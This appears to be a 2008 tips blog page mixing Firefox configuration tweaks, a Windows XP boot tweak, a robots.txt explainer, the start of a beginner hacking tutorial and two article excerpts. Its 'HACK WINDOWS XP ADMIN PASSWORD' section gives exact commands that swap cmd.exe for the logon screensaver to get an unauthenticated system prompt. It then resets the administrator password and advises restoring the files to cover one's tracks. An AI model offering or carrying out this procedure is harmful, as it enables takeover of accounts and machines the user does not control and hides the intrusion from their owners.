GET FIREFOX

Thursday, July 31, 2008

REDUCE FIREFOX RAM USAGE

If you were having less than 512mb ram then you must always be wondering why firefox uses such a large amount of RAM. Well to limit firefox to it's RAM usage you can do the following trick:

Type about:config in the address bar
Now do the following:
  1. In the Filter text box, at the top of the page, type browser.cache.

  2. Double-click the "browser.cache.memory.capacity" entry.

  3. The default is 50000. If you don't have a lot of memory on your system, for example, between 512MB and 1GB, change the number to 15000 and click OK.
And know you can easily run any other application with firefox.

FASTEN UP FIREFOX BY 20%

FASTEN UP FIREFOX:
This trick will teach you to fasten up firefox to it's full limits(even on a Broadband connection)
firstly go to about:config as told before
search for the following keywords and set them by clicking on them

Scroll down the page and find this entry and set it.

Set "network.http.pipelining" to "true"

Set "network.http.proxy.pipelining" to "true"

Set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.

Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it receives.


FIREFOX HACKING about:config

HOPE you must be using Firefox to browse the web. If not so then co and get it now(you will find the link above)
HACK:1 TYPE about:MOZILLA IN THE ADDRESS BAR
You will find a short powm by mozilla

HACK:2 TYPE about:config
You will find the config page of firefox

HACK:3 TYPEchrome://browser/content/browser.xul
AND YOU GET FIREFOX BROWSER INSIDE A FIREFOX BROWSER


FOR A LARGER SCREENSHOT CLICK ON IMAGE



Invisible side of a web site-See what web sites hide from you

You may know that every website has a fill called robots.txt in it's root. This file allows or disallows the search engines to report that results to you that the website owner don't want to tell you about. BUT do you know that still you can view these results by typing /robots.txt after the website address.
for ex. if you want to know what Microsoft hides from you just type www.microsoft.com/robots.txt and you will find the list of directories that bill gates want to hide from you.

THE BEST SITE FOR HACKING

THE BEST SITE FOR LEARNING HACKING IS http://www.hackthissite.org/ BUT THE PROBLEM IS THAT THIS SITE REMAINS 50% OFFLINE. YOU MIGHT BE LUCKY ENOUGH TO GET INTO IT.

Google Algorithm Exposed : SearchToons

The Google Algorithmic manner of ranking and serving relevant online and indexed documents to specific Google queries has been a mystery to many over the past decade, with search marketers and mathematicians working to expose the way Google ranks sites.

Here we look at two disciplines of figuring out the workings behind Google, and two concise calculations.




artcile source:www.searchenginejournal.com

REMOVE WINDOWS LOGIN SCREEN

Now if you want to boot up XP faster then why not remove the bootup screen.

Just do this

Click on your Start Button
Click on the Run
In the browser box, type: MSCONFIG
Click OK
Click the BOOT.INI tab
Check the /NOGUIBOOT box
Click Apply, then OK
When it asks you to restart, please do so.

And now no more Windows XP splash screen.

HACK WINDOWS XP ADMIN PASSWORD

Well you might be unable to get the admin password but you can surely reset it to your liking.
follow these steps.

Log in and go to your DOS command prompt and enter these commands exactly:

cd\
cd\windows\system32
mkdir xphack
copy logon.scr xphack\logon.scr
copy cmd.exe xphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is ouradmin and you want the password 1234 then you would enter “net user ouradmin 1234″ and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of xphack back into system32 to cover your tracks

How to learn to hack in easy steps

Let's start
~~~~~~~~~~~

If you read carefully all what i'm telling here, you are smart and you work hard on it,
you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).
A hacker is someone who is able to discover unknown vulnerabilities in software and able to
write the proper codes to exploit them.

NOTE: If you've been unlucky, and before you found this document, you've readen the
guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.
You won't understand some things from my tutorial until you unpoison your brain.


Some definitions
~~~~~~~~~~~~~~~~

I'm going to refer to every kind of computer as a box, and only as a box.
This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
Michael Knight's car, The Matrix, etc.

The systems we're going to hack (with permission) are plenty of normal users, whose
don't have any remote idea about security, and the root. The root user is called
superuser and is used by the admin to administer the system.

I'm going to refer to the users of a system as lusers. Logically, I'll refer to
the admin as superluser.



Operating Systems
~~~~~~~~~~~~~~~~~

Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,
or perhaps a mac (motorola) box running macOS.

You can't hack with that. In order to hack, you'll need one of those UNIX derived operating
systems.
This is for two main reasons:

-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and
so on. to hack one of them, you need a minimun knowledge of a UNIX system, and what's better
than running it at home?

-all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless
you're running some kind of it.

Let's see where to find the unix you're interested on.

The UNIX systems may be divided in two main groups:

- commercial UNIXes
- free opensource UNIXes

A commercial unix's price is not like windoze's price, and it usually can't run on your box,
so forget it.

The free opensource UNIXes can also be divided in:
- BSD
These are older and difficult to use. The most secure OS (openBSD) is in this group.
You don't want them unless you're planning to install a server on them.

- Linux
Easy to use, stable, secure, and optimized for your kind of box. that's what we need.

I strongly suggest you to get the SuSE distribution of Linux.
It's the best one as i think, and i added here some tips for SuSE, so all should be easier.

Visit http://www.suse.de/ and look for a local store or order it online.
(i know i said it the software was free, but not the CDs nor the manual nor the support.
It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)

If you own an intel box, then order the PC version.

If you own a mac box, then order the PowerPC version.

Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.

It's possible you have problem with your hardware on the installation. Read the manual, ask
for technical support or buy new hardware, just install it as you can.

This is really important! READ THE MANUAL, or even buy a UNIX book.
Books about TCP/IP and C programming are also useful.

If you don't, you won't understand some things i'll explain later. And, of course, you'll
never become a hacker if you don't read a lot of that 'literature'.



the Internet
~~~~~~~~~~~~

Yes! you wanted to hack, didn't you? do you want to hack your own box or what?
You want to hack internet boxes! So lets connect to the internet.

Yes, i know you've gotten this document from the internet, but that was with windoze
and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.
You're a Linux user, and you gotta open your way to the Internet.

You gotta make your Linux box to connect to the net,
so go and set up your modem (using YaST2 in SuSE).



for full article go here http://etricks.in/2008/03/learn-hacking-good-one.html

The Pitfalls of Java as a First Programming Language

Because of its popularity in the context of Web applications and the ease with which beginners can produce graphical programs, Java has become the most widely used language in introductory programming courses. We consider this to be a misguided attempt to make programming more fun, perhaps in reaction to the drop in CS enrollments that followed the dot-com bust. What we observed at New York University is that the Java programming courses did not prepare our students for the first course in systems, much less for more advanced ones. Students found it hard to write programs that did not have a graphic interface, had no feeling for the relationship between the source program and what the hardware would actually do, and (most damaging) did not understand the semantics of pointers at all, which made the use of C in systems programming very challenging.

for full article go here http://www.stsc.hill.af.mil/CrossTalk/2008/01/0801DewarSchonberg.html